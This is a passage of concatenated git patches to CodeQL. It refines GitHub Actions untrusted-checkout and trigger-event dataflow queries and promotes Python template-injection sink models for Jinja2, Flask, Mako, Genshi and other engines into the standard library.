exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(matrixCtxRegex()) and fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) From 3591db9e9cdfaa05a8b8bf6becb1f1fb83c2cdcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:09 +0100 Subject: [PATCH 0936/1267] Remove artifact source as a source of PR refs --- .../security/UntrustedCheckoutQuery.qll | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 1a75f8a96c1..12a65a52baa 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -15,8 +15,6 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { ( // remote flow sources - source instanceof ArtifactSource - or source instanceof GitHubCtxSource or source instanceof GitHubEventCtxSource @@ -245,10 +243,14 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(string value, Expression expr | value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) @@ -275,10 +277,14 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(string value, Expression expr | value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) From f3ada4a92b32b6444755339843600b70ba524e6e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:26 +0100 Subject: [PATCH 0937/1267] Update CompositeActionSources expected file --- .../query-tests/Models/CompositeActionsSources.expected | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected index 87c185fb5e1..3be74bb8bf1 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,12 +1,21 @@ edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | From f6d20195b1e710240e461d8edd771d978488f073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:33:13 +0100 Subject: [PATCH 0938/1267] When trigger event is not known, do not check context trigger maps --- .../codeql/actions/dataflow/FlowSources.qll | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9259f18f108..df3d513d005 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -31,16 +31,19 @@ abstract class RemoteFlowSource extends SourceNode { class GitHubCtxSource extends RemoteFlowSource { string flag; string event; + GitHubExpression e; GitHubCtxSource() { - exists(Expression e, string context, string context_prefix | - this.asExpr() = e and - context = e.getExpression() and - normalizeExpr(context) = "github.head_ref" and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and - contextTriggerDataModel(event, context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") and - flag = "branch" + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) } @@ -58,15 +61,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or - exists(e.getEnclosingCompositeAction()) + not exists(e.getATriggerEvent()) and + event = "unknown" ) and untrustedEventPropertiesDataModel(regexp, flag) and not flag = "json" and @@ -182,20 +186,24 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or - // github.event is taintes for all triggers + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) and flag = "json" ) From 8647073433cb518fc450ee0ecc504d7b9154a21b Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Tue, 5 Nov 2024 17:06:53 +0000 Subject: [PATCH 0939/1267] Copy template injection to standard pack + add jinja sinks --- python/ql/lib/semmle/python/Concepts.qll | 26 ++++++++++ .../lib/semmle/python/frameworks/Jinja2.qll | 0 .../TemplateInjectionCustomizations.qll | 50 +++++++++++++++++++ .../dataflow/TemplateInjectionQuery.qll | 22 ++++++++ .../CWE-074/TemplateConstructionConcept.qll | 7 ++- .../TemplateInjectionCustomizations.qll | 4 +- 6 files changed, 106 insertions(+), 3 deletions(-) create mode 100644 python/ql/lib/semmle/python/frameworks/Jinja2.qll create mode 100644 python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll create mode 100644 python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll diff --git a/python/ql/lib/semmle/python/Concepts.qll b/python/ql/lib/semmle/python/Concepts.qll index cc0712d181b..cf6f0214496 100644 --- a/python/ql/lib/semmle/python/Concepts.qll +++ b/python/ql/lib/semmle/python/Concepts.qll @@ -861,6 +861,32 @@ class LdapFilterEscaping extends Escaping { LdapFilterEscaping() { super.getKind() = Escaping::getLdapFilterKind() } } +/** + * A data-flow node that constructs a template in a templating engine. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `TemplateConstruction::Range` instead. + */ +class TemplateConstruction extends DataFlow::Node instanceof TemplateConstruction::Range { + /** Gets the argument that specifies the template source. */ + DataFlow::Node getSourceArg() { result = super.getSourceArg() } +} + +/** Provides classes for modelling template construction APIs. */ +module TemplateConstruction { + /** + * A data-flow node that constructs a template in a templating engine. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `TemplateConstruction` instead. + */ + abstract class Range extends DataFlow::Node { + /** Gets the argument that specifies the template source. */ + abstract DataFlow::Node getSourceArg(); + } +} + + /** Provides classes for modeling HTTP-related APIs. */ module Http { /** Gets an HTTP verb, in upper case */ diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll new file mode 100644 index 00000000000..e69de29bb2d diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll new file mode 100644 index 00000000000..e61d5525309 --- /dev/null +++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll @@ -0,0 +1,50 @@ +/** + * Provides default sources, sinks and sanitizers for detecting + * "template injection" + * vulnerabilities, as well as extension points for adding your own. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.Concepts +private import semmle.python.dataflow.new.RemoteFlowSources +private import semmle.python.dataflow.new.BarrierGuards + +/** + * Provides default sources, sinks and sanitizers for detecting + * "template injection" + * vulnerabilities, as well as extension points for adding your own. + */ +module TemplateInjection { + /** + * A data flow source for "template injection" vulnerabilities. + */ + abstract class Source extends DataFlow::Node { } + + /** + * A data flow sink for "template injection" vulnerabilities. + */ + abstract class Sink extends DataFlow::Node { } + + /** + * A sanitizer for "template injection" vulnerabilities. + */ + abstract class Sanitizer extends DataFlow::Node { } + + /** + * An active threat-model source, considered as a flow source. + */ + private class ActiveThreatModelSourceAsSource extends Source, ActiveThreatModelSource { } + + /** + * A SQL statement of a SQL construction, considered as a flow sink. + */ + class TemplateConstructionAsSink extends Sink { + TemplateConstructionAsSink() { this = any(TemplateConstruction c).getSourceArg() } + } + + /** + * A comparison with a constant, considered as a sanitizer-guard. + */ + class ConstCompareAsSanitizerGuard extends Sanitizer, ConstCompareBarrier { } +} diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll new file mode 100644 index 00000000000..e5ad529fb37 --- /dev/null +++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll @@ -0,0 +1,22 @@ +/** + * Provides a taint-tracking configuration for detecting "template injection" vulnerabilities. + * + * Note, for performance reasons: only import this file if + * `TemplateInjectionFlow` is needed, otherwise + * `TemplateInjectionCustomizations` should be imported instead. + */ + +private import python +import semmle.python.dataflow.new.DataFlow +import semmle.python.dataflow.new.TaintTracking +import TemplateInjectionCustomizations::TemplateInjection + +module TemplateInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node node) { node instanceof Source } + + predicate isSink(DataFlow::Node node) { node instanceof Sink } + + predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } +} + +module TemplateInjectionFlow = TaintTracking::Global; diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll index a20babf15eb..b4f5cae4449 100644 --- a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll @@ -134,7 +134,12 @@ class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallN /** A call to `jinja2.from_string`. */ class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2FromStringConstruction() { - this = API::moduleImport("jinja2").getMember("from_string").getACall() + this = + API::moduleImport("jinja2") + .getMember("Environment") + .getReturn() + .getMember("from_string") + .getACall() } override DataFlow::Node getSourceArg() { result = this.getArg(0) } diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll index 593ca9fee4c..13c70fc7d04 100644 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll @@ -6,7 +6,7 @@ private import python private import semmle.python.dataflow.new.DataFlow -private import semmle.python.Concepts +private import semmle.python.Concepts as C private import semmle.python.dataflow.new.RemoteFlowSources private import semmle.python.dataflow.new.BarrierGuards private import TemplateConstructionConcept @@ -40,7 +40,7 @@ module TemplateInjection { /** * An active threat-model source, considered as a flow source. */ - private class ActiveThreatModelSourceAsSource extends Source, ActiveThreatModelSource { } + private class ActiveThreatModelSourceAsSource extends Source, C::ActiveThreatModelSource { } /** * A SQL statement of a SQL construction, considered as a flow sink. From 60d8a85a9ccbd5c8099dd925dad7e98057c66c5b Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 6 Nov 2024 09:09:42 +0000 Subject: [PATCH 0940/1267] Promote jinja sinks --- .../lib/semmle/python/frameworks/Jinja2.qll | 49 +++++++++++++++++++ .../CWE-074/TemplateConstructionConcept.qll | 1 + 2 files changed, 50 insertions(+) diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index e69de29bb2d..0b681820f13 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -0,0 +1,49 @@ +/** + * Provides classes modeling security-relevant aspects of the `jinja2` PyPI package. + * See https://jinja.palletsprojects.com. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts +private import semmle.python.frameworks.data.ModelsAsData + +module Jinja2 { + /** A call to `jinja2.Template`. */ + class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { + Jinja2TemplateConstruction() { + this = API::moduleImport("jinja2").getMember("Template").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + + module EnvironmentClass { + /** Gets a reference to the `jinja2.Environment` class. */ + API::Node classRef() { + result = API::moduleImport("jinja2").getMember("Environment") + or + result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*() + } + + /** Gets a reference to an instance of `jinja2.Environment`. */ + private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) { + t.start() and + result = EnvironmentClass::classRef().getACall() + or + exists(DataFlow::TypeTracker t2 | result = instance(t2).track(t2, t)) + } + + /** Gets a reference to an instance of `jinja2.Environment`. */ + DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) } + + /** A call to `jinja2.Environment.from_string`. */ + class Jinja2FromStringConstruction extends TemplateConstruction::Range, DataFlow::MethodCallNode + { + Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + } +} diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll index b4f5cae4449..5144e2ff97b 100644 --- a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll @@ -122,6 +122,7 @@ class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API: override DataFlow::Node getSourceArg() { result = this.getArg(0) } } +// /** A call to `jinja2.Template`. */ class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2TemplateConstruction() { From b2c13fe351894553b1e367c497a57ee10b5f3dc2 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 6 Nov 2024 16:13:36 +0000 Subject: [PATCH 0941/1267] Promote template injection sinks for each framework covered `Cheetah` was excluded as it was last updated 15 years ago and its documentation links are dead. --- python/ql/lib/semmle/python/Frameworks.qll | 8 ++++ .../lib/semmle/python/frameworks/Airspeed.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Bottle.qll | 14 +++++- .../semmle/python/frameworks/Chameleon.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Chevron.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Django.qll | 15 +++++++ .../ql/lib/semmle/python/frameworks/Flask.qll | 9 ++++ .../lib/semmle/python/frameworks/Genshi.qll | 45 +++++++++++++++++++ .../lib/semmle/python/frameworks/Jinja2.qll | 11 ++++- .../ql/lib/semmle/python/frameworks/Mako.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/TRender.qll | 26 +++++++++++ 11 files changed, 229 insertions(+), 3 deletions(-) create mode 100644 python/ql/lib/semmle/python/frameworks/Airspeed.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Chameleon.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Chevron.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Genshi.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Mako.qll create mode 100644 python/ql/lib/semmle/python/frameworks/TRender.qll diff --git a/python/ql/lib/semmle/python/Frameworks.qll b/python/ql/lib/semmle/python/Frameworks.qll index da35994b955..af9417308ab 100644 --- a/python/ql/lib/semmle/python/Frameworks.qll +++ b/python/ql/lib/semmle/python/Frameworks.qll @@ -11,13 +11,17 @@ private import semmle.python.frameworks.Aiohttp private import semmle.python.frameworks.Aiomysql private import semmle.python.frameworks.Aiopg private import semmle.python.frameworks.Aiosqlite +private import semmle.python.frameworks.Airspeed private import semmle.python.frameworks.Anyio private import semmle.python.frameworks.Asyncpg private import semmle.python.frameworks.Baize +private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.BSon private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.CassandraDriver +private import semmle.python.frameworks.Chameleon private import semmle.python.frameworks.Cherrypy +private import semmle.python.frameworks.Chevron private import semmle.python.frameworks.ClickhouseDriver private import semmle.python.frameworks.Cryptodome private import semmle.python.frameworks.Cryptography @@ -30,10 +34,12 @@ private import semmle.python.frameworks.FastApi private import semmle.python.frameworks.Flask private import semmle.python.frameworks.FlaskAdmin private import semmle.python.frameworks.FlaskSqlAlchemy +private import semmle.python.frameworks.Genshi private import semmle.python.frameworks.Gradio private import semmle.python.frameworks.Httpx private import semmle.python.frameworks.Idna private import semmle.python.frameworks.Invoke +private import semmle.python.frameworks.Jinja2 private import semmle.python.frameworks.Jmespath private import semmle.python.frameworks.Joblib private import semmle.python.frameworks.JsonPickle @@ -42,6 +48,7 @@ private import semmle.python.frameworks.Ldap3 private import semmle.python.frameworks.Libtaxii private import semmle.python.frameworks.Libxml2 private import semmle.python.frameworks.Lxml +private import semmle.python.frameworks.Mako private import semmle.python.frameworks.MarkupSafe private import semmle.python.frameworks.Multidict private import semmle.python.frameworks.Mysql @@ -78,6 +85,7 @@ private import semmle.python.frameworks.Streamlit private import semmle.python.frameworks.Toml private import semmle.python.frameworks.Torch private import semmle.python.frameworks.Tornado +private import semmle.python.frameworks.TRender private import semmle.python.frameworks.Twisted private import semmle.python.frameworks.Ujson private import semmle.python.frameworks.Urllib3 diff --git a/python/ql/lib/semmle/python/frameworks/Airspeed.qll b/python/ql/lib/semmle/python/frameworks/Airspeed.qll new file mode 100644 index 00000000000..bdfc2ae357d --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Airspeed.qll @@ -0,0 +1,26 @@ +/** + * Provides classes modeling security-relevant aspects of the `airspeed` library. + * See https://github.com/purcell/airspeed. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `airspeed` library. + * See https://github.com/purcell/airspeed. + */ +module Airspeed { + /** A call to `airspeed.Template`. */ + private class AirspeedTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + AirspeedTemplateConstruction() { + this = API::moduleImport("airspeed").getMember("Template").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} diff --git a/python/ql/lib/semmle/python/frameworks/Bottle.qll b/python/ql/lib/semmle/python/frameworks/Bottle.qll index ce2a41dbaf4..c03ea3df184 100644 --- a/python/ql/lib/semmle/python/frameworks/Bottle.qll +++ b/python/ql/lib/semmle/python/frameworks/Bottle.qll @@ -39,7 +39,7 @@ module Bottle { ViewCallable() { this = any(BottleRouteSetup rs).getARequestHandler() } } - /** Get methods that reprsent a route in Bottle */ + /** Get methods that represent a route in Bottle */ string routeMethods() { result = ["route", "get", "post", "put", "delete", "patch"] } private class BottleRouteSetup extends Http::Server::RouteSetup::Range, DataFlow::CallCfgNode { @@ -171,5 +171,17 @@ module Bottle { override predicate valueAllowsNewline() { none() } } } + + /** Provides models for functions that construct templates. */ + module Templates { + /** A call to `bottle.template`or `bottle.SimpleTemplate`. */ + private class BottleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + BottleTemplateConstruction() { + this = API::moduleImport("bottle").getMember(["template", "SimpleTemplate"]).getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + } } } diff --git a/python/ql/lib/semmle/python/frameworks/Chameleon.qll b/python/ql/lib/semmle/python/frameworks/Chameleon.qll new file mode 100644 index 00000000000..2f86d784b96 --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Chameleon.qll @@ -0,0 +1,26 @@ +/** + * Provides classes modeling security-relevant aspects of the `chameleon` PyPI package. + * See https://chameleon.readthedocs.io/en/latest/. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `chameleon` PyPI package. + * See https://chameleon.readthedocs.io/en/latest/. + */ +module Chameleon { + /** A call to `chameleon.PageTemplate`. */ + private class ChameleonTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + ChameleonTemplateConstruction() { + this = API::moduleImport("chameleon").getMember("PageTemplate").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} diff --git a/python/ql/lib/semmle/python/frameworks/Chevron.qll b/python/ql/lib/semmle/python/frameworks/Chevron.qll new file mode 100644 index 00000000000..5d938fef208 --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Chevron.qll @@ -0,0 +1,26 @@ +/** + * Provides classes modeling security-relevant aspects of the `chevron` PyPI package. + * See https://pypi.org/project/chevron. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `chevron` PyPI package. + * See https://pypi.org/project/chevron. + */ +module Chevron { + /** A call to `chevron.render`. */ + private class ChevronRenderConstruction extends TemplateConstruction::Range, API::CallNode { + ChevronRenderConstruction() { + this = API::moduleImport("chevron").getMember("render").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} diff --git a/python/ql/lib/semmle/python/frameworks/Django.qll b/python/ql/lib/semmle/python/frameworks/Django.qll index 351420818c3..80ef4aef435 100644 --- a/python/ql/lib/semmle/python/frameworks/Django.qll +++ b/python/ql/lib/semmle/python/frameworks/Django.qll @@ -2996,4 +2996,19 @@ module PrivateDjango { any() } } + + // --------------------------------------------------------------------------- + // Templates + // --------------------------------------------------------------------------- + + /** A call to `django.template.Template` */ + private class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + DjangoTemplateConstruction() { + this = API::moduleImport("django").getMember("template").getMember("Template").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + + // TODO: Support `from_string` on instances of `django.template.Engine`. } diff --git a/python/ql/lib/semmle/python/frameworks/Flask.qll b/python/ql/lib/semmle/python/frameworks/Flask.qll index 62722a1958a..cfb8048c6a1 100644 --- a/python/ql/lib/semmle/python/frameworks/Flask.qll +++ b/python/ql/lib/semmle/python/frameworks/Flask.qll @@ -721,4 +721,13 @@ module Flask { preservesValue = false } } + + /** A call to `flask.render_template_string` as a template construction sink. */ + private class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + FlaskTemplateConstruction() { + this = API::moduleImport("flask").getMember("render_template_string").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } } diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll new file mode 100644 index 00000000000..f01b5137aac --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll @@ -0,0 +1,45 @@ +/** + * Provides classes modeling security-relevant aspects of the `Genshi` PyPI package. + * See https://genshi.edgewall.org/. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `Genshi` PyPI package. + * See https://genshi.edgewall.org/. + */ +module Genshi { + /** A call to `genshi.template.text.NewTextTemplate` or `genshi.template.text.OldTextTemplate`. */ + private class GenshiTextTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + GenshiTextTemplateConstruction() { + this = + API::moduleImport("genshi") + .getMember("template") + .getMember("text") + .getMember(["NewTextTemplate", "OldTextTemplate"]) + .getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + + /** A call to `genshi.template.MarkupTemplate` */ + private class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + GenshiMarkupTemplateConstruction() { + this = + API::moduleImport("genshi") + .getMember("template") + .getMember("markup") + .getMember("MarkupTemplate") + .getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } +} diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 0b681820f13..c89ffbe3cc9 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -9,9 +9,15 @@ private import semmle.python.ApiGraphs private import semmle.python.Concepts private import semmle.python.frameworks.data.ModelsAsData +/** + * INTERNAL: Do not use + * + * Provides classes modeling security-relevant aspects of the `jinja2` PyPI package. + * See https://jinja.palletsprojects.com. + */ module Jinja2 { /** A call to `jinja2.Template`. */ - class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { + private class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2TemplateConstruction() { this = API::moduleImport("jinja2").getMember("Template").getACall() } @@ -39,7 +45,8 @@ module Jinja2 { DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) } /** A call to `jinja2.Environment.from_string`. */ - class Jinja2FromStringConstruction extends TemplateConstruction::Range, DataFlow::MethodCallNode + private class Jinja2FromStringConstruction extends TemplateConstruction::Range, + DataFlow::MethodCallNode { Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") } diff --git a/python/ql/lib/semmle/python/frameworks/Mako.qll b/python/ql/lib/semmle/python/frameworks/Mako.qll new file mode 100644 index 00000000000..5dd518a8afe --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Mako.qll @@ -0,0 +1,26 @@ +/** + * Provides classes modeling security-relevant aspects of the `Mako` PyPI package. + * See https://www.makotemplates.org/. + */ + +private import python +private import semmle.python.dataflow.new.DataFlow +private import semmle.python.ApiGraphs +private import semmle.python.Concepts + +/** + * INTERNAL: Do not use. + * + * Provides classes modeling security-relevant aspects of the `Mako` PyPI package. + * See https://www.makotemplates.org/. + */ +module Mako { + /** A call to `mako.template.Template`. */ + private class 